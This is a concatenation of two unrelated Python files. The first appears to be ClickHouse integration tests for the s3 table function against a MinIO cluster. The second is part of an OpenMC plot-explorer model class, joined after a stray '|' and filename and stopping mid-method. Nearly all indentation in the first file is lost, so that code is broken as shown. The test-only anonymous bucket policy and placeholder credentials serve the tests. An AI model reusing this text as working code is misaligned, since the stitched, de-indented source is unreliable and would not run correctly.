logging.getLogger().setLevel(logging.INFO)
logging.getLogger().addHandler(logging.StreamHandler())
SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))
CONFIG_PATH = os.path.join(SCRIPT_DIR, './_instances/dummy/configs/config.d/defaultS3.xml')
# Creates S3 bucket for tests and allows anonymous read-write access to it.
def prepare_s3_bucket(cluster):
# Allows read-write access for bucket without authorization.
bucket_read_write_policy = {"Version": "2012-10-17",
"Statement": [
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:GetBucketLocation",
"Resource": "arn:aws:s3:::root"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:ListBucket",
"Resource": "arn:aws:s3:::root"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:GetObject",
"Resource": "arn:aws:s3:::root/*"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:PutObject",
"Resource": "arn:aws:s3:::root/*"
}
]}
minio_client = cluster.minio_client
minio_client.set_bucket_policy(cluster.minio_bucket, json.dumps(bucket_read_write_policy))
cluster.minio_restricted_bucket = "{}-with-auth".format(cluster.minio_bucket)
if minio_client.bucket_exists(cluster.minio_restricted_bucket):
minio_client.remove_bucket(cluster.minio_restricted_bucket)
minio_client.make_bucket(cluster.minio_restricted_bucket)
def put_s3_file_content(cluster, bucket, filename, data):
buf = io.BytesIO(data)
cluster.minio_client.put_object(bucket, filename, buf, len(data))
# Returns content of given S3 file as string.
def get_s3_file_content(cluster, bucket, filename, decode=True):
    # type: (ClickHouseCluster, str, str, bool) -> str
data = cluster.minio_client.get_object(bucket, filename)
data_str = b""
for chunk in data.stream():
data_str += chunk
if decode:
return data_str.decode()
return data_str
@pytest.fixture(scope="module")
def cluster():
try:
cluster = ClickHouseCluster(__file__)
cluster.add_instance("restricted_dummy", main_configs=["configs/config_for_test_remote_host_filter.xml"],
with_minio=True)
cluster.add_instance("dummy", with_minio=True, main_configs=["configs/defaultS3.xml"])
cluster.add_instance("s3_max_redirects", with_minio=True, main_configs=["configs/defaultS3.xml"],
user_configs=["configs/s3_max_redirects.xml"])
logging.info("Starting cluster...")
cluster.start()
logging.info("Cluster started")
prepare_s3_bucket(cluster)
logging.info("S3 bucket created")
run_s3_mock(cluster)
yield cluster
finally:
cluster.shutdown()
def run_query(instance, query, stdin=None, settings=None):
# type: (ClickHouseInstance, str, object, dict) -> str
logging.info("Running query '{}'...".format(query))
result = instance.query(query, stdin=stdin, settings=settings)
logging.info("Query finished")
return result
# Test simple put.
@pytest.mark.parametrize("maybe_auth,positive", [
("", True),
("'minio','minio123',", True),
("'wrongid','wrongkey',", False)
])
def test_put(cluster, maybe_auth, positive):
# type: (ClickHouseCluster) -> None
bucket = cluster.minio_bucket if not maybe_auth else cluster.minio_restricted_bucket
instance = cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 2, 3), (3, 2, 1), (78, 43, 45)"
values_csv = "1,2,3\n3,2,1\n78,43,45\n"
filename = "test.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') values {}".format(
cluster.minio_host, cluster.minio_port, bucket, filename, maybe_auth, table_format, values)
try:
run_query(instance, put_query)
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
assert values_csv == get_s3_file_content(cluster, bucket, filename)
# Test put no data to S3.
@pytest.mark.parametrize("auth", [
"'minio','minio123',"
])
def test_empty_put(cluster, auth):
# type: (ClickHouseCluster) -> None
bucket = cluster.minio_bucket
instance = cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
create_empty_table_query = """
CREATE TABLE empty_table (
{}
) ENGINE = Null()
""".format(table_format)
run_query(instance, create_empty_table_query)
filename = "empty_put_test.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') select * from empty_table".format(
cluster.minio_host, cluster.minio_port, bucket, filename, auth, table_format)
run_query(instance, put_query)
try:
run_query(instance, "select count(*) from s3('http://{}:{}/{}/{}', {}'CSV', '{}')".format(
cluster.minio_host, cluster.minio_port, bucket, filename, auth, table_format))
        assert False, "Query should have failed."
except helpers.client.QueryRuntimeException as e:
        assert str(e).find("The specified key does not exist") != -1
# Test put values in CSV format.
@pytest.mark.parametrize("maybe_auth,positive", [
("", True),
("'minio','minio123',", True),
("'wrongid','wrongkey',", False)
])
def test_put_csv(cluster, maybe_auth, positive):
# type: (ClickHouseCluster) -> None
bucket = cluster.minio_bucket if not maybe_auth else cluster.minio_restricted_bucket
instance = cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') format CSV".format(
cluster.minio_host, cluster.minio_port, bucket, filename, maybe_auth, table_format)
csv_data = "8,9,16\n11,18,13\n22,14,2\n"
try:
run_query(instance, put_query, stdin=csv_data)
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
assert csv_data == get_s3_file_content(cluster, bucket, filename)
# Test put and get with S3 server redirect.
def test_put_get_with_redirect(cluster):
# type: (ClickHouseCluster) -> None
bucket = cluster.minio_bucket
instance = cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 1, 1), (1, 1, 1), (11, 11, 11)"
values_csv = "1,1,1\n1,1,1\n11,11,11\n"
filename = "test.csv"
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
cluster.minio_redirect_host, cluster.minio_redirect_port, bucket, filename, table_format, values)
run_query(instance, query)
assert values_csv == get_s3_file_content(cluster, bucket, filename)
query = "select *, column1*column2*column3 from s3('http://{}:{}/{}/{}', 'CSV', '{}')".format(
cluster.minio_redirect_host, cluster.minio_redirect_port, bucket, filename, table_format)
stdout = run_query(instance, query)
assert list(map(str.split, stdout.splitlines())) == [
["1", "1", "1", "1"],
["1", "1", "1", "1"],
["11", "11", "11", "1331"],
]
# Test put with restricted S3 server redirect.
def test_put_with_zero_redirect(cluster):
# type: (ClickHouseCluster) -> None
bucket = cluster.minio_bucket
instance = cluster.instances["s3_max_redirects"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 1, 1), (1, 1, 1), (11, 11, 11)"
filename = "test.csv"
# Should work without redirect
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
cluster.minio_host, cluster.minio_port, bucket, filename, table_format, values)
run_query(instance, query)
# Should not work with redirect
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
cluster.minio_redirect_host, cluster.minio_redirect_port, bucket, filename, table_format, values)
exception_raised = False
try:
run_query(instance, query)
except Exception as e:
assert str(e).find("Too many redirects while trying to access") != -1
exception_raised = True
finally:
assert exception_raised
def test_put_get_with_globs(cluster):
# type: (ClickHouseCluster) -> None
bucket = cluster.minio_bucket
instance = cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
max_path = ""
for i in range(10):
for j in range(10):
path = "{}_{}/{}.csv".format(i, random.choice(['a', 'b', 'c', 'd']), j)
max_path = max(path, max_path)
values = "({},{},{})".format(i, j, i + j)
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
cluster.minio_host, cluster.minio_port, bucket, path, table_format, values)
run_query(instance, query)
query = "select sum(column1), sum(column2), sum(column3), min(_file), max(_path) from s3('http://{}:{}/{}/*_{{a,b,c,d}}/%3f.csv', 'CSV', '{}')".format(
cluster.minio_redirect_host, cluster.minio_redirect_port, bucket, table_format)
assert run_query(instance, query).splitlines() == [
"450\t450\t900\t0.csv\t{bucket}/{max_path}".format(bucket=bucket, max_path=max_path)]
# Test multipart put.
@pytest.mark.parametrize("maybe_auth,positive", [
("", True),
# ("'minio','minio123',",True), Redirect with credentials not working with nginx.
("'wrongid','wrongkey',", False),
])
def test_multipart_put(cluster, maybe_auth, positive):
# type: (ClickHouseCluster) -> None
bucket = cluster.minio_bucket if not maybe_auth else cluster.minio_restricted_bucket
instance = cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
# Minimum size of part is 5 Mb for Minio.
# See: https://github.com/minio/minio/blob/master/docs/minio-limits.md
min_part_size_bytes = 5 * 1024 * 1024
csv_size_bytes = int(min_part_size_bytes * 1.5) # To have 2 parts.
one_line_length = 6 # 3 digits, 2 commas, 1 line separator.
# Generate data having size more than one part
int_data = [[1, 2, 3] for i in range(csv_size_bytes // one_line_length)]
csv_data = "".join(["{},{},{}\n".format(x, y, z) for x, y, z in int_data])
assert len(csv_data) > min_part_size_bytes
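    # With these sizes the generated CSV is 5 MiB * 1.5 = 7,864,320 bytes, i.e.
    # 1,310,720 six-byte "1,2,3\n" rows, so the upload must be split into at
    # least two multipart parts (the figures only restate the arithmetic above).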
filename = "test_multipart.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') format CSV".format(
cluster.minio_redirect_host, cluster.minio_redirect_port, bucket, filename, maybe_auth, table_format)
try:
run_query(instance, put_query, stdin=csv_data, settings={'s3_min_upload_part_size': min_part_size_bytes,
's3_max_single_part_upload_size': 0})
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
# Use proxy access logs to count number of parts uploaded to Minio.
proxy_logs = cluster.get_container_logs("proxy1") # type: str
assert proxy_logs.count("PUT /{}/{}".format(bucket, filename)) >= 2
assert csv_data == get_s3_file_content(cluster, bucket, filename)
def test_remote_host_filter(cluster):
instance = cluster.instances["restricted_dummy"]
format = "column1 UInt32, column2 UInt32, column3 UInt32"
query = "select *, column1*column2*column3 from s3('http://{}:{}/{}/test.csv', 'CSV', '{}')".format(
"invalid_host", cluster.minio_port, cluster.minio_bucket, format)
assert "not allowed in config.xml" in instance.query_and_get_error(query)
other_values = "(1, 1, 1), (1, 1, 1), (11, 11, 11)"
query = "insert into table function s3('http://{}:{}/{}/test.csv', 'CSV', '{}') values {}".format(
"invalid_host", cluster.minio_port, cluster.minio_bucket, format, other_values)
assert "not allowed in config.xml" in instance.query_and_get_error(query)
@pytest.mark.parametrize("s3_storage_args", [
"''", # 1 arguments
"'','','','','',''" # 6 arguments
])
def test_wrong_s3_syntax(cluster, s3_storage_args):
instance = cluster.instances["dummy"] # type: ClickHouseInstance
expected_err_msg = "Code: 42" # NUMBER_OF_ARGUMENTS_DOESNT_MATCH
query = "create table test_table_s3_syntax (id UInt32) ENGINE = S3({})".format(s3_storage_args)
assert expected_err_msg in instance.query_and_get_error(query)
# https://en.wikipedia.org/wiki/One_Thousand_and_One_Nights
def test_s3_glob_scheherazade(cluster):
bucket = cluster.minio_bucket
instance = cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
max_path = ""
values = "(1, 1, 1)"
nights_per_job = 1001 // 30
jobs = []
for night in range(0, 1001, nights_per_job):
def add_tales(start, end):
for i in range(start, end):
path = "night_{}/tale.csv".format(i)
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
cluster.minio_host, cluster.minio_port, bucket, path, table_format, values)
run_query(instance, query)
jobs.append(threading.Thread(target=add_tales, args=(night, min(night + nights_per_job, 1001))))
jobs[-1].start()
for job in jobs:
job.join()
query = "select count(), sum(column1), sum(column2), sum(column3) from s3('http://{}:{}/{}/night_*/tale.csv', 'CSV', '{}')".format(
cluster.minio_redirect_host, cluster.minio_redirect_port, bucket, table_format)
assert run_query(instance, query).splitlines() == ["1001\t1001\t1001\t1001"]
def run_s3_mock(cluster):
logging.info("Starting s3 mock")
container_id = cluster.get_container_id('resolver')
current_dir = os.path.dirname(__file__)
cluster.copy_file_to_container(container_id, os.path.join(current_dir, "s3_mock", "mock_s3.py"), "mock_s3.py")
cluster.exec_in_container(container_id, ["python", "mock_s3.py"], detach=True)
# Wait for S3 mock start
for attempt in range(10):
ping_response = cluster.exec_in_container(cluster.get_container_id('resolver'),
["curl", "-s", "http://resolver:8080/"], nothrow=True)
if ping_response != 'OK':
if attempt == 9:
assert ping_response == 'OK', 'Expected "OK", but got "{}"'.format(ping_response)
else:
time.sleep(1)
else:
break
logging.info("S3 mock started")
def replace_config(old, new):
    with open(CONFIG_PATH, 'r') as config:
        config_lines = config.readlines()
    config_lines = [line.replace(old, new) for line in config_lines]
    with open(CONFIG_PATH, 'w') as config:
        config.writelines(config_lines)
def test_custom_auth_headers(cluster):
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
get_query = "select * from s3('http://resolver:8080/{bucket}/{file}', 'CSV', '{table_format}')".format(
bucket=cluster.minio_restricted_bucket,
file=filename,
table_format=table_format)
instance = cluster.instances["dummy"] # type: ClickHouseInstance
result = run_query(instance, get_query)
assert result == '1\t2\t3\n'
instance.query(
"CREATE TABLE test ({table_format}) ENGINE = S3('http://resolver:8080/{bucket}/{file}', 'CSV')".format(
bucket=cluster.minio_restricted_bucket,
file=filename,
table_format=table_format
))
assert run_query(instance, "SELECT * FROM test") == '1\t2\t3\n'
replace_config("<header>Authorization: Bearer TOKEN", "<header>Authorization: Bearer INVALID_TOKEN")
instance.query("SYSTEM RELOAD CONFIG")
ret, err = instance.query_and_get_answer_with_error("SELECT * FROM test")
assert ret == "" and err != ""
replace_config("<header>Authorization: Bearer INVALID_TOKEN", "<header>Authorization: Bearer TOKEN")
instance.query("SYSTEM RELOAD CONFIG")
assert run_query(instance, "SELECT * FROM test") == '1\t2\t3\n'
def test_custom_auth_headers_exclusion(cluster):
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
get_query = f"SELECT * FROM s3('http://resolver:8080/{cluster.minio_restricted_bucket}/restricteddirectory/{filename}', 'CSV', '{table_format}')"
instance = cluster.instances["dummy"] # type: ClickHouseInstance
with pytest.raises(helpers.client.QueryRuntimeException) as ei:
result = run_query(instance, get_query)
print(result)
assert ei.value.returncode == 243
assert '403 Forbidden' in ei.value.stderr
def test_infinite_redirect(cluster):
bucket = "redirected"
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
get_query = "select * from s3('http://resolver:8080/{bucket}/{file}', 'CSV', '{table_format}')".format(
bucket=bucket,
file=filename,
table_format=table_format)
instance = cluster.instances["dummy"] # type: ClickHouseInstance
exception_raised = False
try:
run_query(instance, get_query)
except Exception as e:
assert str(e).find("Too many redirects while trying to access") != -1
exception_raised = True
finally:
assert exception_raised
@pytest.mark.parametrize("extension,method", [
("bin", "gzip"),
("gz", "auto")
])
def test_storage_s3_get_gzip(cluster, extension, method):
bucket = cluster.minio_bucket
instance = cluster.instances["dummy"]
filename = f"test_get_gzip.{extension}"
name = "test_get_gzip"
data = [
"Sophia Intrieri,55",
"Jack Taylor,71",
"Christopher Silva,66",
"Clifton Purser,35",
"Richard Aceuedo,43",
"Lisa Hensley,31",
"Alice Wehrley,1",
"Mary Farmer,47",
"Samara Ramirez,19",
"Shirley Lloyd,51",
"Santos Cowger,0",
"Richard Mundt,88",
"Jerry Gonzalez,15",
"Angela James,10",
"Norman Ortega,33",
""
]
buf = io.BytesIO()
compressed = gzip.GzipFile(fileobj=buf, mode="wb")
compressed.write(("\n".join(data)).encode())
compressed.close()
put_s3_file_content(cluster, bucket, filename, buf.getvalue())
try:
run_query(instance, f"""CREATE TABLE {name} (name String, id UInt32) ENGINE = S3(
'http://{cluster.minio_host}:{cluster.minio_port}/{bucket}/{filename}',
'CSV',
'{method}')""")
        assert run_query(instance, "SELECT sum(id) FROM {}".format(name)).splitlines() == ["565"]
finally:
run_query(instance, f"DROP TABLE {name}")
def test_storage_s3_put_uncompressed(cluster):
bucket = cluster.minio_bucket
instance = cluster.instances["dummy"]
filename = "test_put_uncompressed.bin"
name = "test_put_uncompressed"
data = [
"'Gloria Thompson',99",
"'Matthew Tang',98",
"'Patsy Anderson',23",
"'Nancy Badillo',93",
"'Roy Hunt',5",
"'Adam Kirk',51",
"'Joshua Douds',28",
"'Jolene Ryan',0",
"'Roxanne Padilla',50",
"'Howard Roberts',41",
"'Ricardo Broughton',13",
"'Roland Speer',83",
"'Cathy Cohan',58",
"'Kathie Dawson',100",
"'Gregg Mcquistion',11",
]
try:
run_query(instance, "CREATE TABLE {} (name String, id UInt32) ENGINE = S3('http://{}:{}/{}/{}', 'CSV')".format(
name, cluster.minio_host, cluster.minio_port, bucket, filename))
run_query(instance, "INSERT INTO {} VALUES ({})".format(name, "),(".join(data)))
        assert run_query(instance, "SELECT sum(id) FROM {}".format(name)).splitlines() == ["753"]
uncompressed_content = get_s3_file_content(cluster, bucket, filename)
assert sum([ int(i.split(',')[1]) for i in uncompressed_content.splitlines() ]) == 753
finally:
run_query(instance, f"DROP TABLE {name}")
@pytest.mark.parametrize("extension,method", [
("bin", "gzip"),
("gz", "auto")
])
def test_storage_s3_put_gzip(cluster, extension, method):
bucket = cluster.minio_bucket
instance = cluster.instances["dummy"]
filename = f"test_put_gzip.{extension}"
name = "test_put_gzip"
data = [
"'Joseph Tomlinson',5",
"'Earnest Essary',44",
"'Matha Pannell',24",
"'Michael Shavers',46",
"'Elias Groce',38",
"'Pamela Bramlet',50",
"'Lewis Harrell',49",
"'Tamara Fyall',58",
"'George Dixon',38",
"'Alice Walls',49",
"'Paula Mais',24",
"'Myrtle Pelt',93",
"'Sylvia Naffziger',18",
"'Amanda Cave',83",
"'Yolanda Joseph',89"
]
try:
run_query(instance, f"""CREATE TABLE {name} (name String, id UInt32) ENGINE = S3(
'http://{cluster.minio_host}:{cluster.minio_port}/{bucket}/{filename}',
'CSV',
'{method}')""")
run_query(instance, "INSERT INTO {} VALUES ({})".format(name, "),(".join(data)))
        assert run_query(instance, "SELECT sum(id) FROM {}".format(name)).splitlines() == ["708"]
buf = io.BytesIO(get_s3_file_content(cluster, bucket, filename, decode=False))
f = gzip.GzipFile(fileobj=buf, mode="rb")
uncompressed_content = f.read().decode()
assert sum([ int(i.split(',')[1]) for i in uncompressed_content.splitlines() ]) == 708
finally:
run_query(instance, f"DROP TABLE {name}")
|
plotmodel.py
|
from ast import literal_eval
from collections import defaultdict
import copy
import itertools
import threading
from PySide2.QtWidgets import QItemDelegate, QColorDialog, QLineEdit, QMessageBox
from PySide2.QtCore import QAbstractTableModel, QModelIndex, Qt, QSize, QEvent
from PySide2.QtGui import QColor
import openmc
import openmc.lib
import numpy as np
from .statepointmodel import StatePointModel
from .plot_colors import random_rgb, reset_seed
ID, NAME, COLOR, COLORLABEL, MASK, HIGHLIGHT = tuple(range(0, 6))
__VERSION__ = "0.2.1"
_VOID_REGION = -1
_NOT_FOUND = -2
_OVERLAP = -3
_MODEL_PROPERTIES = ('temperature', 'density')
_PROPERTY_INDICES = {'temperature': 0, 'density': 1}
_REACTION_UNITS = 'Reactions per Source Particle'
_FLUX_UNITS = 'Particle-cm per Source Particle'
_PRODUCTION_UNITS = 'Particles Produced per Source Particle'
_ENERGY_UNITS = 'eV per Source Particle'
_SPATIAL_FILTERS = (openmc.UniverseFilter,
openmc.MaterialFilter,
openmc.CellFilter,
openmc.MeshFilter)
_PRODUCTIONS = ('delayed-nu-fission', 'prompt-nu-fission', 'nu-fission',
'nu-scatter', 'H1-production', 'H2-production',
'H3-production', 'He3-production', 'He4-production')
_SCORE_UNITS = {p: _PRODUCTION_UNITS for p in _PRODUCTIONS}
_SCORE_UNITS['flux'] = 'Particle-cm/Particle'
_SCORE_UNITS['current'] = 'Particles per source Particle'
_SCORE_UNITS['events'] = 'Events per Source Particle'
_SCORE_UNITS['inverse-velocity'] = 'Particle-seconds per Source Particle'
_SCORE_UNITS['heating'] = _ENERGY_UNITS
_SCORE_UNITS['heating-local'] = _ENERGY_UNITS
_SCORE_UNITS['kappa-fission'] = _ENERGY_UNITS
_SCORE_UNITS['fission-q-prompt'] = _ENERGY_UNITS
_SCORE_UNITS['fission-q-recoverable'] = _ENERGY_UNITS
_SCORE_UNITS['decay-rate'] = 'Seconds^-1'
_SCORE_UNITS['damage-energy'] = _ENERGY_UNITS
_TALLY_VALUES = {'Mean': 'mean',
'Std. Dev.': 'std_dev',
'Rel. Error': 'rel_err'}
class PlotModel():
""" Geometry and plot settings for OpenMC Plot Explorer model
Attributes
----------
geom : openmc.Geometry instance
OpenMC Geometry of the model
modelCells : collections.OrderedDict
Dictionary mapping cell IDs to openmc.Cell instances
modelMaterials : collections.OrderedDict
Dictionary mapping material IDs to openmc.Material instances
ids : NumPy int array (v_res, h_res, 1)
Mapping of plot coordinates to cell/material ID by pixel
image : NumPy int array (v_res, h_res, 3)
The current RGB image data
statepoint : StatePointModel
Simulation data model used to display tally results
applied_filters : tuple of ints
IDs of the applied filters for the displayed tally
previousViews : list of PlotView instances
List of previously created plot view settings used to undo
changes made in plot explorer
subsequentViews : list of PlotView instances
List of undone plot view settings used to redo changes made
in plot explorer
defaultView : PlotView instance
Default settings for given geometry
currentView : PlotView instance
Currently displayed plot settings in plot explorer
activeView : PlotView instance
Active state of settings in plot explorer, which may or may not
have unapplied changes
"""
def __init__(self):
""" Initialize PlotModel class attributes """
# Retrieve OpenMC Cells/Materials
self.modelCells = openmc.lib.cells
self.modelMaterials = openmc.lib.materials
self.max_universe_levels = openmc.lib._coord_levels()
# Cell/Material ID by coordinates
self.ids = None
self.instances = None
self.version = __VERSION__
# default statepoint value
self._statepoint = None
# default tally/filter info
self.appliedFilters = ()
self.appliedScores = ()
self.appliedNuclides = ()
# reset random number seed for consistent
# coloring when reloading a model
reset_seed()
self.previousViews = []
self.subsequentViews = []
self.defaultView = self.getDefaultView()
self.currentView = copy.deepcopy(self.defaultView)
self.activeView = copy.deepcopy(self.defaultView)
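    # A hedged sketch of typical use (assumes an OpenMC model has already been
    # initialized through openmc.lib, on which this class relies):
    #
    #     model = PlotModel()
    #     model.activeView.colorby = 'material'   # hypothetical tweak
    #     model.generatePlot()                    # fills model.ids and model.image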
def openStatePoint(self, filename):
self.statepoint = StatePointModel(filename, open_file=True)
@property
def statepoint(self):
return self._statepoint
@statepoint.setter
def statepoint(self, statepoint):
if statepoint is None:
self._statepoint = None
elif isinstance(statepoint, StatePointModel):
self._statepoint = statepoint
elif isinstance(statepoint, str):
self._statepoint = StatePointModel(statepoint, open_file=True)
else:
raise TypeError("Invalid statepoint object")
if self._statepoint and not self._statepoint.is_open:
self._statepoint.open()
def getDefaultView(self):
""" Generates default PlotView instance for OpenMC geometry
Centers plot view origin in every dimension if possible. Defaults
        to xy basis, with height and width to accommodate the full size of
        the geometry. Defaults to (0, 0, 0) origin with width and height of
        25 if the geometry bounding box cannot be generated.
Returns
-------
default : PlotView instance
PlotView instance with default view settings
"""
lower_left, upper_right = openmc.lib.global_bounding_box()
# Check for valid bounding_box dimensions
if -np.inf not in lower_left[:2] and np.inf not in upper_right[:2]:
xcenter = (upper_right[0] + lower_left[0])/2
width = abs(upper_right[0] - lower_left[0]) * 1.005
ycenter = (upper_right[1] + lower_left[1])/2
height = abs(upper_right[1] - lower_left[1]) * 1.005
else:
xcenter, ycenter, width, height = (0.00, 0.00, 25, 25)
if lower_left[2] != -np.inf and upper_right[2] != np.inf:
zcenter = (upper_right[2] + lower_left[2])/2
else:
zcenter = 0.00
default = PlotView([xcenter, ycenter, zcenter], width, height)
return default
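    # Worked example of the centering above: for a bounding box from
    # (-10, -10, -5) to (10, 10, 5) (hypothetical numbers), the default view is
    # centered at (0, 0, 0) with width = height = 20 * 1.005 = 20.1.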
def resetColors(self):
""" Reset colors to those generated in the default view """
self.activeView.cells = self.defaultView.cells
self.activeView.materials = self.defaultView.materials
def generatePlot(self):
""" Spawn thread from which to generate new plot image """
t = threading.Thread(target=self.makePlot)
t.start()
t.join()
def makePlot(self):
""" Generate new plot image from active view settings
Creates corresponding .xml files from user-chosen settings.
Runs OpenMC in plot mode to generate new plot image.
"""
cv = self.currentView = copy.deepcopy(self.activeView)
ids = openmc.lib.id_map(cv)
props = openmc.lib.property_map(cv)
self.cell_ids = ids[:, :, 0]
self.instances = ids[:, :, 1]
self.mat_ids = ids[:, :, 2]
# set model ids based on domain
if cv.colorby == 'cell':
self.ids = self.cell_ids
domain = cv.cells
source = self.modelCells
else:
self.ids = self.mat_ids
domain = cv.materials
source = self.modelMaterials
# generate colors if not present
for cell_id, cell in cv.cells.items():
if cell.color is None:
cell.color = random_rgb()
for mat_id, mat in cv.materials.items():
if mat.color is None:
mat.color = random_rgb()
# construct image data
domain[_OVERLAP] = DomainView(_OVERLAP, "Overlap", cv.overlap_color)
domain[_NOT_FOUND] = DomainView(_NOT_FOUND, "Not Found", cv.domainBackground)
u, inv = np.unique(self.ids, return_inverse=True)
image = np.array([domain[id].color for id in u])[inv]
image.shape = (cv.v_res, cv.h_res, 3)
if cv.masking:
for id, dom in domain.items():
if dom.masked:
image[self.ids == int(id)] = cv.maskBackground
if cv.highlighting:
for id, dom in domain.items():
if dom.highlight:
image[self.ids == int(id)] = cv.highlightBackground
# set model image
self.image = image
# set model properties
self.properties = props
# tally data
self.tally_data = None
self.properties[self.properties < 0.0] = np.nan
self.temperatures = self.properties[..., _PROPERTY_INDICES['temperature']]
self.densities = self.properties[..., _PROPERTY_INDICES['density']]
minmax = {}
for prop in _MODEL_PROPERTIES:
idx = _PROPERTY_INDICES[prop]
prop_data = self.properties[:, :, idx]
minmax[prop] = (np.min(np.nan_to_num(prop_data)),
np.max(np.nan_to_num(prop_data)))
self.activeView.data_minmax = minmax
def undo(self):
""" Revert to previous PlotView instance. Re-generate plot image """
if self.previousViews:
self.subsequentViews.append(copy.deepcopy(self.currentView))
self.activeView = self.previousViews.pop()
self.generatePlot()
def redo(self):
""" Revert to subsequent PlotView instance. Re-generate plot image """
if self.subsequentViews:
self.storeCurrent()
self.activeView = self.subsequentViews.pop()
self.generatePlot()
def storeCurrent(self):
""" Add current view to previousViews list """
self.previousViews.append(copy.deepcopy(self.currentView))
def create_tally_image(self, view=None):
if view is None:
view = self.currentView
tally_id = view.selectedTally
scores = self.appliedScores
nuclides = self.appliedNuclides
tally_selected = view.selectedTally is not None
tally_visible = view.tallyDataVisible
visible_selection = scores and nuclides
if not tally_selected or not tally_visible or not visible_selection:
return (None, None, None, None, None)
tally = self.statepoint.tallies[tally_id]
tally_value = _TALLY_VALUES[view.tallyValue]
# check score units
units = {_SCORE_UNITS.get(score, _REACTION_UNITS) for score in scores}
if len(units) != 1:
msg_box = QMessageBox()
unit_str = " ".join(units)
msg = "The scores selected have incompatible units:\n"
for unit in units:
msg += " - {}\n".format(unit)
msg_box.setText(msg)
msg_box.setIcon(QMessageBox.Information)
msg_box.setStandardButtons(QMessageBox.Ok)
msg_box.exec_()
return (None, None, None, None, None)
units_out = list(units)[0]
if tally.contains_filter(openmc.MeshFilter):
if tally_value == 'rel_err':
# get both the std. dev. data and mean data
# to create the relative error data
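            # relative error (%) = 100 * std. dev. / mean, with zero-mean bins
            # guarded against division by zero below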
mean_data = self._create_tally_mesh_image(tally,
'mean',
scores,
nuclides,
view)
std_dev_data = self._create_tally_mesh_image(tally,
'std_dev',
scores,
nuclides,
view)
image_data = 100 * np.divide(std_dev_data[0],
mean_data[0],
out=np.zeros_like(mean_data[0]),
                                         where=mean_data[0] != 0)
extents = mean_data[1]
data_min = np.min(image_data)
data_max = np.max(image_data)
return image_data, extents, data_min, data_max, '% error'
else:
image = self._create_tally_mesh_image(tally,
tally_value,
scores,
nuclides,
view)
return image + (units_out,)
else:
# same as above, get the std. dev. data
            # and mean data to produce the relative error data
if tally_value == 'rel_err':
mean_data = self._create_tally_domain_image(tally,
'mean',
scores,
nuclides,
view)
std_dev_data = self._create_tally_domain_image(tally,
'std_dev',
scores,
nuclides,
view)
image_data = 100 * np.divide(std_dev_data[0],
mean_data[0],
out=np.zeros_like(mean_data[0]),
                                             where=mean_data[0] != 0)
# adjust for NaNs in bins without tallies
image_data = np.nan_to_num(image_data,
nan=0.0,
posinf=0.0,
neginf=0.0)
extents = mean_data[1]
data_min = np.min(image_data)
data_max = np.max(image_data)
return image_data, extents, data_min, data_max, '% error'
else:
image = self._create_tally_domain_image(tally,
tally_value,
scores,
nuclides,
view)
return image + (units_out,)
def _create_tally_domain_image(self, tally, tally_value, scores, nuclides, view=None):
# data resources used throughout
if view is None:
view = self.currentView
data = tally.get_reshaped_data(tally_value)
data_out = np.full(self.ids.shape, -1.0)
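        # -1.0 is a sentinel for "no tally value here"; those pixels are
        # masked out at the end of this method.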
def _do_op(array, tally_value, ax=0):
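            # Means are reduced by a plain sum; standard deviations are
            # combined in quadrature (sqrt of the sum of squares), assuming
            # independent bins.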
if tally_value == 'mean':
return np.sum(array, axis=ax)
elif tally_value == 'std_dev':
return np.sqrt(np.sum(array**2, axis=ax))
# data structure for tracking which spatial
# filter bins are enabled
spatial_filter_bins = defaultdict(list)
n_spatial_filters = 0
for tally_filter in tally.filters:
if tally_filter in self.appliedFilters:
selected_bins = self.appliedFilters[tally_filter]
if type(tally_filter) in _SPATIAL_FILTERS:
spatial_filter_bins[tally_filter] = selected_bins
n_spatial_filters += 1
else:
slc = [slice(None)] * len(data.shape)
slc[n_spatial_filters] = selected_bins
slc = tuple(slc)
data = _do_op(data[slc], tally_value, n_spatial_filters)
else:
data[:, ...] = 0.0
data = _do_op(data, tally_value, n_spatial_filters)
# filter by selected scores
selected_scores = []
for idx, score in enumerate(tally.scores):
if score in scores:
selected_scores.append(idx)
data = _do_op(data[..., np.array(selected_scores)], tally_value, -1)
# filter by selected nuclides
selected_nuclides = []
